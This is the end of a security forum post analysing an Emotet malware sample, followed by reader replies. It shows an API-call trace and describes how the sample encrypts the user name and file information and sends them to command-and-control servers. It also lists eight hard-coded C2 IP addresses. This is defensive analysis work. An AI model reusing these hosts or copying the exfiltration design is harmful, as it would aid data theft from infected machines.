0x622F82     eax: 777BDF20 | ntdll_1.memset
0x6228DD     eax: 76ED3102 | kernel32.lstrcpyW
0x6228F3     eax: 76ED3102 | kernel32.lstrcpyW
0x622934     eax: 762196F6 | shell32.SHFileOperationW
0x625D45     eax: 7734BB71 | shlwapi.PathFindFileNameW
0x625D69     eax: 76F344CF | kernel32.RemoveDirectoryW
0x6241A6     eax: 76EB7A10 | kernel32.ExitProcess
```

Having understood the flow, look at what is passed to CryptEncrypt: it sends the local user name and file information to the server.

RSA and AES are used for the upload to the server.

InternetReadFile:

It also downloads something onto the local machine; here the C2 server may already be dead, as the file size is 0.

The C2 addresses are hard-coded, and it interacts with the C2 servers:

C2 server addresses:

```
216.10.40.16
91.121.54.71
209.236.123.42
77.55.211.77
85.105.140.135
138.97.60.141
217.13.106.14
190.2.31.172
```

Latest replies (13)

顾何 2020-9-21 11:10
Thanks for sharing~ This should be a fairly new version of Emotet; last week I also saw many samples with the same structure, quite active.
The analysis is very detailed, my support~
By the way, if convenient, next time please package the analyzed sample and upload it to the forum for readers who want to practise.
L0x1c 2020-9-21 11:27
(reply to 顾何) Thanks
L0x1c 2020-9-21 11:27
(reply to 顾何) I'll package it next time; this is my first post, so I'm not too familiar with it yet.
如斯咩咩咩 2020-9-21 12:03
源哥 is awesome
pureGavin 2020-9-21 12:19
(reply to L0x1c) mark; you can add the malware sample afterwards from the post editing page.
L0x1c 2020-9-21 12:21
(reply to pureGavin) get!
L0x1c 2020-9-21 12:22
(reply to 如斯咩咩咩) 二木哥 is awesome!
不懂就不懂 2020-9-21 14:02
So this is Emotet again; I only looked at the macro and didn't look at the downloaded Emotet. Many thanks.
provence 2020-9-22 16:15
源哥, forever the legend!
VirtualCC 2020-9-22 16:27
(reply to provence) +1
posidelaijie 2020-9-23 10:47
Requesting the sample
xiaozuzhi 2020-9-25 18:19
This variant has a huge number of C2s; it sends packets to them in a loop, you can take a look.
RNGorgeous 2020-10-12 11:36
Requesting the sample please, big shot